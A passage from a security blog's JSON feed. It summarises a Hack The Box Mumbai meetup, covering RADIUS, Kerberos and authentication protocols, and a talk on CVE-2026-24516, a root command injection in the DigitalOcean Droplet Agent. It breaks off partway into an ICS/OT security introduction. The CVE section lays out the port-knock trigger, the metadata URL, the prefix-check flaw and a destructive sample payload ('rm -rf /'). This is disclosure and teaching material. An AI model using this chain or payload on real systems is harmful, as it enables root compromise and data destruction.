on the untrusted edge; the AS is inside the trusted ISP/domain. Clients reachable from the public internet can talk to RAS, but they should never be trusted to store long-term secrets (no credential caching on the edge when the path may be compromised).</p>\n</li>\n<li class=\"\">\n<p>So what is the catch here? any consequence? Yes, every login may require the RAS to query the AS, increasing traffic between RAS and AS. To limit bandwidth/complexity, protocols were designed to be simple and lightweight.</p>\n</li>\n</ul>\n<p>That's where our hero comes in!!</p>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"radius\">RADIUS<a href=\"https://haxnation.github.io/blog/htb-mumbai-meetup-16-summary#radius\" class=\"hash-link\" aria-label=\"Direct link to RADIUS\" title=\"Direct link to RADIUS\" translate=\"no\">​</a></h4>\n<p><mark><strong>RADIUS</strong> (Remote Authentication Dial-In User Service) was created for that model: a lightweight, client/server AAA protocol where the NAS (RAS) forwards credentials to a RADIUS server (the AS) and receives simple codes back:</mark></p>\n<ul>\n<li class=\"\"><em>Access-Request</em> — authentication request from NAS to server</li>\n<li class=\"\"><em>Access-Accept</em> — success</li>\n<li class=\"\"><em>Access-Reject</em> — failure</li>\n<li class=\"\"><em>Access-Challenge</em> — challenge/response flow</li>\n<li class=\"\"><em>Accounting (Interim-Update, Start, Stop)</em> — usage records</li>\n<li class=\"\"><em>Change-of-Authorization (CoA)</em> — dynamic policy changes</li>\n</ul>\n<p>RADIUS uses a shared symmetric secret between NAS and server (no expensive public-key handshake at every transaction), and simple packet types to keep bandwidth and processing small. That design trades end-to-end cryptographic guarantees for simplicity and lower per-request cost.</p>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"authentication-protocol-types-brief\">Authentication protocol types (brief)<a href=\"https://haxnation.github.io/blog/htb-mumbai-meetup-16-summary#authentication-protocol-types-brief\" class=\"hash-link\" aria-label=\"Direct link to Authentication protocol types (brief)\" title=\"Direct link to Authentication protocol types (brief)\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\"><em><strong>PAP</strong></em> (Password Authentication Protocol): <mark>very simple; credentials are sent in the clear by PPP/PAP (RADIUS hides them using the shared secret/MD5 obfuscation).</mark> Easy to implement but weak; servers may store password-equivalent data for verification.</li>\n<li class=\"\"><em><strong>CHAP</strong></em> (Challenge-Handshake Authentication Protocol): <mark>challenge/response using one-way hashes (no plaintext sent).</mark> Useful to avoid replay but requires reversible secret material at the verifier in some deployments.</li>\n<li class=\"\"><em><strong>MS-CHAP / MS-CHAPv2</strong></em>: Microsoft variants with incremental improvements (and notable historical weaknesses).</li>\n<li class=\"\"><em><strong>EAP</strong></em> (Extensible Authentication Protocol): <mark>framework that allows many methods (TLS, OTP, token cards) and is commonly proxied over RADIUS for Wi‑Fi/802.1X and VPNs.</mark></li>\n</ul>\n<blockquote>\n<p><strong>Note:</strong> <em>RADIUS and credential handling</em>\n<mark>Some authentication methods require the server to know the user's actual password (or something equivalent to it) in order to verify the login.</mark></p>\n<ul>\n<li class=\"\"><em><strong>Why this happens:</strong></em> some NAS-side auth methods (PAP, certain CHAP deployments) require the verifier to compute or compare values derived from a user's secret. That often forces a RADIUS server to hold plaintext or password-equivalent material so it can validate requests.</li>\n<li class=\"\"><em><strong>Risk:</strong></em> storing password-equivalent data on RADIUS (or on any front-line AAA box) increases blast radius — a compromised RADIUS/proxy exposes many user secrets and enables lateral abuse.</li>\n<li class=\"\"><em><strong>Practical limitation:</strong></em> hashed+salted passwords (one-way hashes) are safest for storage, but they make some challenge/response schemes (that need the raw secret) impossible without an intermediary that can perform verification.</li>\n</ul>\n</blockquote>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"accounting-and-interim-update-tracking-usage\">Accounting and Interim-Update (tracking usage)<a href=\"https://haxnation.github.io/blog/htb-mumbai-meetup-16-summary#accounting-and-interim-update-tracking-usage\" class=\"hash-link\" aria-label=\"Direct link to Accounting and Interim-Update (tracking usage)\" title=\"Direct link to Accounting and Interim-Update (tracking usage)\" translate=\"no\">​</a></h4>\n<p><mark><strong>RADIUS Accounting</strong> (RFC 2866) supports session records:</mark></p>\n<ul>\n<li class=\"\"><em>Start, Interim-Update, Stop.</em></li>\n<li class=\"\"><mark><em><strong>Interim-Update</strong></em> messages are periodic reports (common interval: every 5 minutes) that carry bytes/packets/time counters.</mark></li>\n<li class=\"\">These let the provider track quota consumption (e.g., a 30 GB monthly pack), perform throttling when limits are hit, or terminate sessions when allowance is exhausted.</li>\n<li class=\"\">Timestamps are Unix-time based and are commonly used in billing/analytics.</li>\n</ul>\n<p>What happens? an example flow -</p>\n<ul>\n<li class=\"\">NAS sends Start when user connects, Interim-Update periodically, and Stop when session ends.</li>\n<li class=\"\">The accounting server aggregates and enforces policies (throttle, suspend, terminate).</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"what-would-you-do-when-the-internal-network-cannot-be-fully-trusted\">What would you do when the internal network cannot be fully trusted?<a href=\"https://haxnation.github.io/blog/htb-mumbai-meetup-16-summary#what-would-you-do-when-the-internal-network-cannot-be-fully-trusted\" class=\"hash-link\" aria-label=\"Direct link to What would you do when the internal network cannot be fully trusted?\" title=\"Direct link to What would you do when the internal network cannot be fully trusted?\" translate=\"no\">​</a></h3>\n<p>If you cannot or do not want to trust the internal network or want to avoid hammering the AS with repeated full authentications, introduce a <em><strong>ticketing model</strong></em> (PS: Our soft inro to the three headed god: The <strong>Kerberos</strong>):</p>\n<ul>\n<li class=\"\"><mark>The <em><strong>Authentication Service (AS)</strong></em> issues a time-bound cryptographic ticket (<em><strong>TGT</strong></em>) after initial authentication.</mark></li>\n<li class=\"\"><mark>The client uses the ticket to request service tickets from a <em><strong>Ticket-Granting Service (TGS)</strong></em> for specific services, avoiding repeated full auths to the AS.</mark></li>\n<li class=\"\"><mark>Tickets contain timestamps/nonces and are encrypted so replay attacks are mitigated; digital signatures or authenticators further protect freshness.</mark></li>\n</ul>\n<p>This offloads repeated authentication from the AS/KDC and enables <em><strong>single sign-on (SSO)</strong></em>. <mark><strong>Kerberos</strong> is primarily symmetric-key based (with public-key extensions) and relies on a <strong>KDC</strong> (AS + TGS) and synchronized time for replay protection.</mark></p>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"directory-services-and-domain-controllers\">Directory services and Domain Controllers<a href=\"https://haxnation.github.io/blog/htb-mumbai-meetup-16-summary#directory-services-and-domain-controllers\" class=\"hash-link\" aria-label=\"Direct link to Directory services and Domain Controllers\" title=\"Direct link to Directory services and Domain Controllers\" translate=\"no\">​</a></h4>\n<p>Many deployments pair <strong>Kerberos</strong> with a directory (<em><strong>LDAP</strong></em> / <em><strong>Active Directory</strong></em>). <mark><strong>LDAP</strong> stores user principals, service principals, and attributes (groups, policies).</mark> In Windows ecosystems the <em><strong>Domain Controller (DC)</strong></em> <mark>bundles KDC functionality, LDAP directory, DNS, and other services required for centralized identity and service discovery.</mark></p>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"session-2-from-ssrf-to-rce-discovering-cve-in-digital-ocean-droplet-agent-by-anmol-singh-rajput\">Session 2: \"From SSRF to RCE: Discovering CVE in Digital Ocean Droplet Agent\" by Anmol Singh Rajput<a href=\"https://haxnation.github.io/blog/htb-mumbai-meetup-16-summary#session-2-from-ssrf-to-rce-discovering-cve-in-digital-ocean-droplet-agent-by-anmol-singh-rajput\" class=\"hash-link\" aria-label=\"Direct link to Session 2: &quot;From SSRF to RCE: Discovering CVE in Digital Ocean Droplet Agent&quot; by Anmol Singh Rajput\" title=\"Direct link to Session 2: &quot;From SSRF to RCE: Discovering CVE in Digital Ocean Droplet Agent&quot; by Anmol Singh Rajput\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"digitalocean-droplets-and-the-droplet-agent\">DigitalOcean Droplets and the Droplet Agent<a href=\"https://haxnation.github.io/blog/htb-mumbai-meetup-16-summary#digitalocean-droplets-and-the-droplet-agent\" class=\"hash-link\" aria-label=\"Direct link to DigitalOcean Droplets and the Droplet Agent\" title=\"Direct link to DigitalOcean Droplets and the Droplet Agent\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\">DigitalOcean Droplets are Linux-based virtual machines (VMs) provided by DigitalOcean.</li>\n<li class=\"\">The <em><strong>Droplet Agent</strong></em> is a system service installed on every Droplet that handles tasks like SSH key management and configuration monitoring.</li>\n<li class=\"\">Because it manages critical system configuration, it runs with <em><strong>high privileges (root)</strong></em>.</li>\n</ul>\n<blockquote>\n<p><mark>Metadata Services (169.254.169.254): Cloud providers use a local, non-routable IP address to allow VMs to query information about themselves (metadata).</mark> This address is only accessible from inside the VM or the internal network.</p>\n</blockquote>\n<blockquote>\n<p><mark>Server-Side Request Forgery (SSRF):</mark> an attacker forces a server to make network requests on their behalf. In cloud environments, SSRF is often used to trick the web server into querying the provider's metadata service.</p>\n</blockquote>\n<blockquote>\n<p><mark>Command Injection &amp; RCE:</mark> command injection occurs when unsafe, user-supplied data is passed to a system shell. Remote Code Execution (RCE) is the ultimate goal: arbitrary commands running on the target machine remotely.</p>\n</blockquote>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"comprehensive-summary-cve-2026-24516\">Comprehensive Summary: CVE-2026-24516<a href=\"https://haxnation.github.io/blog/htb-mumbai-meetup-16-summary#comprehensive-summary-cve-2026-24516\" class=\"hash-link\" aria-label=\"Direct link to Comprehensive Summary: CVE-2026-24516\" title=\"Direct link to Comprehensive Summary: CVE-2026-24516\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\"><strong>CVE:</strong> CVE-2026-24516</li>\n<li class=\"\"><strong>Vulnerability Type:</strong> Command Injection</li>\n<li class=\"\"><strong>Target:</strong> DigitalOcean Droplet Agent</li>\n<li class=\"\"><strong>Impact:</strong> Unauthenticated Remote Code Execution (RCE) as Root</li>\n<li class=\"\"><strong>Researcher:</strong> Anmol Singh Rajput (poxsky)</li>\n<li class=\"\"><strong>Reported:</strong> January 2026</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-droplet-agent-and-the-danger\">The Droplet Agent and the Danger<a href=\"https://haxnation.github.io/blog/htb-mumbai-meetup-16-summary#the-droplet-agent-and-the-danger\" class=\"hash-link\" aria-label=\"Direct link to The Droplet Agent and the Danger\" title=\"Direct link to The Droplet Agent and the Danger\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\">The DigitalOcean Droplet Agent (codename \"DOTTY\") runs as a system service with <em><strong>root privileges</strong></em> on every Droplet.</li>\n<li class=\"\">Its core functions include SSH key management, monitoring SSH configurations, and executing troubleshooting commands via a metadata API.</li>\n<li class=\"\">The danger comes from the agent trusting the link-local metadata address at <mark>169[.]254[.]169[.]254</mark> without authentication.</li>\n<li class=\"\">The source code is publicly accessible on GitHub, which made the attack surface easier to analyze.</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-vulnerable-attack-chain\">The Vulnerable Attack Chain<a href=\"https://haxnation.github.io/blog/htb-mumbai-meetup-16-summary#the-vulnerable-attack-chain\" class=\"hash-link\" aria-label=\"Direct link to The Vulnerable Attack Chain\" title=\"Direct link to The Vulnerable Attack Chain\" translate=\"no\">​</a></h3>\n<p>The researcher found a 5-step exploit chain that leads to complete system compromise:</p>\n<ol>\n<li class=\"\"><strong>Port Knocking</strong>: The agent listens for a specific, undocumented TCP SYN packet on port 22. The packet must contain hardcoded sequence and acknowledgment numbers corresponding to the ASCII values for \"DODO\" and \"TTY\".</li>\n<li class=\"\"><strong>Metadata Fetch</strong>: Once the port knock is detected, the agent requests troubleshooting metadata from <mark>http[:]//169[.]254[.]169[.]254/metadata/v1[.]json</mark>.</li>\n<li class=\"\"><strong>Flawed Validation</strong>: The system validates the command string using <code>HasPrefix(artifact, \"command:\")</code> instead of enforcing an exact match.</li>\n<li class=\"\"><strong>Direct Execution</strong>: Because only the prefix is checked, an attacker can append malicious payloads like <code>command:bash -c 'rm -rf /'</code>, which are passed directly to <code>cmd.Run()</code> and <code>exec.CommandContext()</code> without sanitization.</li>\n<li class=\"\"><strong>Root RCE</strong>: The arbitrary commands execute with the agent's root privileges.</li>\n</ol>\n<div class=\"diagram-container\">\n<figure>\n<img decoding=\"async\" loading=\"lazy\" class=\"diagram-img img_ev3q\" src=\"https://raw.githubusercontent.com/haxnation/blog/main/blog/param-jasani/htb-meetup/imgs/full-exploit-chain.png\" alt=\"Agent logs showing exploit in progress\">\n<figcaption class=\"diagram-caption\"><strong>Fig 2.1:</strong> Agent logs during exploitation — port knocking detected, metadata requests to 169[.]254[.]169[.]254, and command execution in progress.</figcaption>\n</figure>\n</div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"realistic-attack-scenarios\">Realistic Attack Scenarios<a href=\"https://haxnation.github.io/blog/htb-mumbai-meetup-16-summary#realistic-attack-scenarios\" class=\"hash-link\" aria-label=\"Direct link to Realistic Attack Scenarios\" title=\"Direct link to Realistic Attack Scenarios\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\"><strong>Scenario A (SSRF Chain Attack):</strong> An attacker exploits an existing SSRF bug in a customer's web app to reach the internal metadata IP. They serve a malicious JSON response containing crafted commands and send the magic TCP SYN packet to trigger execution. This requires <em><strong>zero credentials</strong></em> and <em><strong>zero user interaction</strong></em>.</li>\n<li class=\"\"><strong>Scenario B (Network Compromise):</strong> An attacker on the same network segment intercepts metadata traffic (for example via ARP poisoning) and sets up a fake metadata server on 169[.]254[.]169[.]254. They then trigger the vulnerability using the port knocking sequence.</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"global-impact\">Global Impact<a href=\"https://haxnation.github.io/blog/htb-mumbai-meetup-16-summary#global-impact\" class=\"hash-link\" aria-label=\"Direct link to Global Impact\" title=\"Direct link to Global Impact\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\"><strong>Scale:</strong> Over 100,000 Droplets were potentially at risk.</li>\n<li class=\"\"><strong>Speed:</strong> Exploitation takes less than one hour.</li>\n<li class=\"\"><strong>Consequences:</strong> Attackers could exfiltrate sensitive data (SSH keys, database passwords, <code>/etc/shadow</code> dumps, application secrets), establish persistence (SSH backdoors, rootkits, cron jobs), or deploy wide-scale ransomware or supply chain attacks.</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-researchers-journey--key-takeaways\">The Researcher's Journey &amp; Key Takeaways<a href=\"https://haxnation.github.io/blog/htb-mumbai-meetup-16-summary#the-researchers-journey--key-takeaways\" class=\"hash-link\" aria-label=\"Direct link to The Researcher's Journey &amp; Key Takeaways\" title=\"Direct link to The Researcher's Journey &amp; Key Takeaways\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\"><strong>Timeline:</strong> Report submitted on Jan 20, initially closed as \"Out of Scope\" due to a perceived lack of realistic exploitation scenario. It was escalated on Jan 23 with detailed MITM and SSRF attack paths, then MITRE assigned the CVE and the vendor confirmed the vulnerability.</li>\n<li class=\"\"><strong>Suggested Fixes:</strong> exact command allowlists, input sanitization, metadata authentication with HMAC signatures, and rate limiting for port knocking.</li>\n</ul>\n<blockquote>\n<p><strong>Lessons Learned for Hunters:</strong></p>\n<ul>\n<li class=\"\">Read public source code to find open attack surfaces.</li>\n<li class=\"\">Combine minor issues into critical vulnerabilities through chaining.</li>\n<li class=\"\">Never assume link-local addresses are safe.</li>\n<li class=\"\">If you believe in your finding after a rejection, escalate with solid evidence.</li>\n</ul>\n</blockquote>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"references-and-further-reading\">References and further reading<a href=\"https://haxnation.github.io/blog/htb-mumbai-meetup-16-summary#references-and-further-reading\" class=\"hash-link\" aria-label=\"Direct link to References and further reading\" title=\"Direct link to References and further reading\" translate=\"no\">​</a></h2>\n<ul>\n<li class=\"\">RFC 2865 — Remote Authentication Dial In User Service (RADIUS): <a href=\"https://www.rfc-editor.org/rfc/rfc2865.txt\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">https://www.rfc-editor.org/rfc/rfc2865.txt</a></li>\n<li class=\"\">RFC 2866 — RADIUS Accounting: <a href=\"https://www.rfc-editor.org/rfc/rfc2866.txt\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">https://www.rfc-editor.org/rfc/rfc2866.txt</a></li>\n<li class=\"\">RFC 4120 — The Kerberos Network Authentication Service (V5): <a href=\"https://www.rfc-editor.org/rfc/rfc4120.txt\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">https://www.rfc-editor.org/rfc/rfc4120.txt</a></li>\n<li class=\"\">RFC 3748 — Extensible Authentication Protocol (EAP): <a href=\"https://www.rfc-editor.org/rfc/rfc3748.txt\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">https://www.rfc-editor.org/rfc/rfc3748.txt</a></li>\n<li class=\"\">RFC 1334 / RFC 1994 — PPP PAP and CHAP (historical PPP auth): <a href=\"https://www.rfc-editor.org/rfc/rfc1334.txt\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">https://www.rfc-editor.org/rfc/rfc1334.txt</a> and <a href=\"https://www.rfc-editor.org/rfc/rfc1994.txt\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">https://www.rfc-editor.org/rfc/rfc1994.txt</a></li>\n<li class=\"\">RADIUS overview (background/history): <a href=\"https://en.wikipedia.org/wiki/RADIUS\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">https://en.wikipedia.org/wiki/RADIUS</a></li>\n<li class=\"\">Kerberos overview (history and tickets): <a href=\"https://en.wikipedia.org/wiki/Kerberos_(protocol)\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">https://en.wikipedia.org/wiki/Kerberos_(protocol)</a></li>\n<li class=\"\">History of Authentication: <a href=\"https://cybersecurity.asee.io/blog/history-of-authentication/\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">https://cybersecurity.asee.io/blog/history-of-authentication/</a></li>\n<li class=\"\">The History of the Computer Password: <a href=\"https://www.wired.com/2012/01/computer-password/\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">https://www.wired.com/2012/01/computer-password/</a></li>\n<li class=\"\">Password History and Evolution: <a href=\"https://fusionauth.io/blog/password-history\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">https://fusionauth.io/blog/password-history</a></li>\n<li class=\"\">DigitalOcean metadata service overview: <a href=\"https://docs.digitalocean.com/products/droplets/how-to/use-metadata/\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">https://docs.digitalocean.com/products/droplets/how-to/use-metadata/</a></li>\n<li class=\"\">OWASP SSRF overview: <a href=\"https://owasp.org/www-community/attacks/Server_Side_Request_Forgery\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">https://owasp.org/www-community/attacks/Server_Side_Request_Forgery</a></li>\n<li class=\"\">MITRE CVE-2026-24516: <a href=\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-24516\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-24516</a></li>\n</ul>",
            "url": "https://haxnation.github.io/blog/htb-mumbai-meetup-16-summary",
            "title": "Summary of HTB Mumbai Meetup held on 30th May 2026",
            "summary": "This blog is a summary of what was taught at  HTB Meetup Mumbai #16 held on 30th May 2026.\n",
            "date_modified": "2026-05-31T04:00:00.000Z",
            "author": {
                "name": "Param Jasani",
                "url": "https://github.com/param-jasani"
            },
            "tags": [
                "auth",
                "RADIUS",
                "kerberos",
                "CVE-2026-24516",
                "dotty",
                "RCE",
                "HTB-Mumbai-Meetup-Summary"
            ]
        },
        {
            "id": "https://haxnation.github.io/blog/introduction-to-ics-ot-security",
            "content_html": "<style>\n.diagram-container { margin: 1.5rem auto; max-width: 820px; text-align: center; }\n.diagram-caption { font-size: 0.95rem; color: #3a3a3a; margin-top: 0.5rem; }\n.diagram-img { width: 100%; max-width: 780px; border-radius: 12px; box-shadow: 0 16px 40px rgba(0,0,0,0.08); }\n.diagram-svg { width: 100%; max-width: 780px; height: auto; display: inline-block; transition: transform 0.25s ease; }\n.diagram-svg:hover { transform: scale(1.01); }\n.diagram-svg rect, .diagram-svg circle, .diagram-svg line, .diagram-svg polygon, .diagram-svg path { stroke: #4c7ece; stroke-width: 1.8; fill: rgba(13,63,145,0.08); transition: fill 0.25s ease, stroke 0.25s ease; }\n.diagram-container:hover .diagram-svg rect, .diagram-container:hover .diagram-svg circle { fill: rgba(13,63,145,0.16); }\n.diagram-container:hover .diagram-svg line, .diagram-container:hover .diagram-svg path { stroke: #082a67; }\n.diagram-text { font-family: ui-sans-serif, system-ui, sans-serif; fill: #4c7ece; font-size: 12px; }\n.diagram-title { font-family: ui-sans-serif, system-ui, sans-serif; fill: #4c7ece; font-size: 13px; font-weight: 700; }\n</style>\n<p>This blog introduces the fundamentals of ICS/OT security, including key industrial cybersecurity terminology, the differences between IT and OT environments. We’ll also explore core concepts and common components used in industrial systems.</p>\n<div class=\"language-bash codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:#F8F8F2;--prism-background-color:#282A36\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-bash codeBlock_bY9V thin-scrollbar\" style=\"color:#F8F8F2;background-color:#282A36\"><code class=\"codeBlockLines_e6Vv\"><div class=\"token-line\" style=\"color:#F8F8F2\"><span class=\"token plain\">$ ./greet.sh</span><br></div><div class=\"token-line\" style=\"color:#F8F8F2\"><span class=\"token plain\">Hey folks</span><span class=\"token operator\">!</span><span class=\"token operator\">!</span><span class=\"token plain\"> Param this side, your technical blog partner. </span><br></div><div class=\"token-line\" style=\"color:#F8F8F2\"><span class=\"token plain\">I will be starting a blog series on ICS/OT security. </span><br></div><div class=\"token-line\" style=\"color:#F8F8F2\"><span class=\"token plain\">If you are reading this </span><span class=\"token keyword\" style=\"color:rgb(189, 147, 249);font-style:italic\">then</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:rgb(80, 250, 123)\">most</span><span class=\"token plain\"> probably you and I are on the same path and believe me I am too new to this domain and will be navigating my and your path through this. </span><br></div><div class=\"token-line\" style=\"color:#F8F8F2\"><span class=\"token plain\">So my blog series will be covering notes, difficulties I faced, labs that I will </span><span class=\"token keyword\" style=\"color:rgb(189, 147, 249);font-style:italic\">do</span><span class=\"token plain\"> and much much more, I will keep this blog series raw as much as possible. </span><br></div><div class=\"token-line\" style=\"color:#F8F8F2\"><span class=\"token plain\">Besides this blog series I will posting some blogs here and there, so </span><span class=\"token keyword\" style=\"color:rgb(189, 147, 249);font-style:italic\">do</span><span class=\"token plain\"> check them out. </span><br></div><div class=\"token-line\" style=\"color:#F8F8F2\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></div><div class=\"token-line\" style=\"color:#F8F8F2\"><span class=\"token plain\">$ </span><span class=\"token function\" style=\"color:rgb(80, 250, 123)\">whoami</span><span class=\"token plain\"> </span><br></div><div class=\"token-line\" style=\"color:#F8F8F2\"><span class=\"token plain\">I am Param, named after a supercomputer but not one</span><span class=\"token operator\">!</span><span class=\"token operator\">!</span><span class=\"token plain\">, trying to learn and get better </span><span class=\"token keyword\" style=\"color:rgb(189, 147, 249);font-style:italic\">in</span><span class=\"token plain\"> this field everyday. </span><br></div><div class=\"token-line\" style=\"color:#F8F8F2\"><span class=\"token plain\">I always say that </span><span class=\"token keyword\" style=\"color:rgb(189, 147, 249);font-style:italic\">if</span><span class=\"token plain\"> Morpheus appeared </span><span class=\"token keyword\" style=\"color:rgb(189, 147, 249);font-style:italic\">in</span><span class=\"token plain\"> my life and gave me an option to choose between blue pill and red pill, I would always choose blue pill, as I like to dwell into my illusion of protecting people </span><span class=\"token keyword\" style=\"color:rgb(189, 147, 249);font-style:italic\">in</span><span class=\"token plain\"> a SOC environment, ~ you saw what I did there </span><span class=\"token punctuation\" style=\"color:rgb(248, 248, 242)\">;</span><span class=\"token punctuation\" style=\"color:rgb(248, 248, 242)\">)</span><span class=\"token plain\"> </span><span class=\"token builtin class-name\" style=\"color:rgb(189, 147, 249)\">.</span><br></div></code></pre></div></div>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"1-basic-terminology\">1. Basic Terminology<a href=\"https://haxnation.github.io/blog/introduction-to-ics-ot-security#1-basic-terminology\" class=\"hash-link\" aria-label=\"Direct link to 1. Basic Terminology\" title=\"Direct link to 1. Basic Terminology\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"11-what-is-ot\">1.1 What is OT?<a href=\"https://haxnation.github.io/blog/introduction-to-ics-ot-security#11-what-is-ot\" class=\"hash-link\" aria-label=\"Direct link to 1.1 What is OT?\" title=\"Direct link to 1.1 What is OT?\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\"><strong>Operational Technology (OT)</strong> is an umbrella term that refers to the <mark>hardware, software, and technology systems used to monitor, control, and manage physical devices, processes, and infrastructure in industrial and operational environments.</mark></li>\n<li class=\"\">Therefore, <mark>OT is actually a broad category that includes ICS as one of its major components</mark>, along with other technologies such as Industrial Internet of Things (IIoT) devices, smart sensors, robotics, asset management systems, predictive maintenance platforms, digital twins, and edge computing solutions.</li>\n<li class=\"\">OT prioritizes <mark>availability, then integrity and then confidentiality</mark>; so CIA triad in reverse, more of a <strong>AIC triad</strong>.</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"12-what-is-ics\">1.2 What is ICS?<a href=\"https://haxnation.github.io/blog/introduction-to-ics-ot-security#12-what-is-ics\" class=\"hash-link\" aria-label=\"Direct link to 1.2 What is ICS?\" title=\"Direct link to 1.2 What is ICS?\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\"><strong>Industrial Control System (ICS)</strong> is an umbrella term that is used to refer to the <mark>integrated hardware, software, and network system that are responsible for monitoring, automating and controlling physical industrial processes.</mark></li>\n<li class=\"\">Therefore, <mark>ICS is actually aggregate of a variety of a system types including process control systems (PCS), distributed control systems (DCS), supervisory control and data acquisition (SCADA) systems, safety instrumented systems (SIS), and many others.</mark></li>\n</ul>\n<blockquote>\n<p><strong>Summary,</strong> <br>\nEverything that deals with the physical/operational world is <strong>OT</strong> and\nthe control brains inside the OT world that actually make decisions to open/close valves, stop motors, adjust temperature comes under <strong>ICS</strong>.</p>\n</blockquote>\n<blockquote>\n<p><strong>Note</strong> - <br>\n<em>All ICS is OT, but not All OT is ICS.</em></p>\n</blockquote>\n<div class=\"diagram-container\">\n<figure>\n<img decoding=\"async\" loading=\"lazy\" class=\"diagram-img img_ev3q\" src=\"https://cdn.prod.website-files.com/645a45d56fc4750d4edd96fe/672500beb02d8cd3ba644608_652db196f291207aec0433eb_ICS-Cybersecurity-03.webp\" alt=\"ICS cybersecurity architecture and convergence\">\n<figcaption class=\"diagram-caption\"><strong>Fig 1.1:</strong> ICS cybersecurity architecture showing how IT and OT converge in modern industrial environments.</figcaption>\n</figure>\n\n</div>\n<p>We have looked into how ICS and OT are different from each other, now let's cover how IT and OT are different from each other.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"13-difference-between-it--ot\">1.3 Difference between IT &amp; OT<a href=\"https://haxnation.github.io/blog/introduction-to-ics-ot-security#13-difference-between-it--ot\" class=\"hash-link\" aria-label=\"Direct link to 1.3 Difference between IT &amp; OT\" title=\"Direct link to 1.3 Difference between IT &amp; OT\" translate=\"no\">​</a></h3>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n<table><thead><tr><th>Feature</th><th>Information Technology (IT)</th><th>Operational Technology (OT)</th></tr></thead><tbody><tr><td>Primary Focus</td><td>Data management and processing.</td><td>Physical process control and safety.</td></tr><tr><td>Core Priority (Triad)</td><td>Confidentiality, Integrity, Availability.</td><td>Availability, Integrity, Confidentiality.</td></tr><tr><td>System Lifespan</td><td>Short (3–5 years for hardware/OS).</td><td>Long (15–30 years of continuous operation).</td></tr><tr><td>System Updates</td><td>Frequent, automated, often forced.</td><td>Rare; requires scheduled, manual downtime.</td></tr><tr><td>Performance Needs</td><td>Flexible (jitter/latency is manageable).</td><td>Deterministic (real-time, microsecond precision).</td></tr><tr><td>Connectivity</td><td>Standard (Internet-exposed, cloud-ready).</td><td>Historically isolated; now increasingly networked.</td></tr><tr><td>Typical Hardware</td><td>Servers, PCs, Cloud, Mobile, Networking.</td><td>PLCs, RTUs, Sensors, Actuators, HMIs.</td></tr><tr><td>Failure Consequence</td><td>Loss of data, financial/reputational damage.</td><td>Physical damage, environmental harm, loss of life.</td></tr></tbody></table>\n<div class=\"diagram-container\">\n<figure>\n<img decoding=\"async\" loading=\"lazy\" class=\"diagram-img img_ev3q\" src=\"https://hoanlk.com/wp-content/uploads/2023/04/itvsot.png\" alt=\"IT vs OT comparison diagram\">\n<figcaption class=\"diagram-caption\"><strong>Fig 1.2:</strong> IT vs OT comparison showing the characteristics and focus areas of Information Technology versus Operational Technology.</figcaption>\n</figure></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"14-what-is-an-asset-in-ics\">1.4 What is an asset in ICS?<a href=\"https://haxnation.github.io/blog/introduction-to-ics-ot-security#14-what-is-an-asset-in-ics\" class=\"hash-link\" aria-label=\"Direct link to 1.4 What is an asset in ICS?\" title=\"Direct link to 1.4 What is an asset in ICS?\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\">An asset is a component that is used within an industrial control system.</li>\n<li class=\"\">They can be classified broadly in two types, 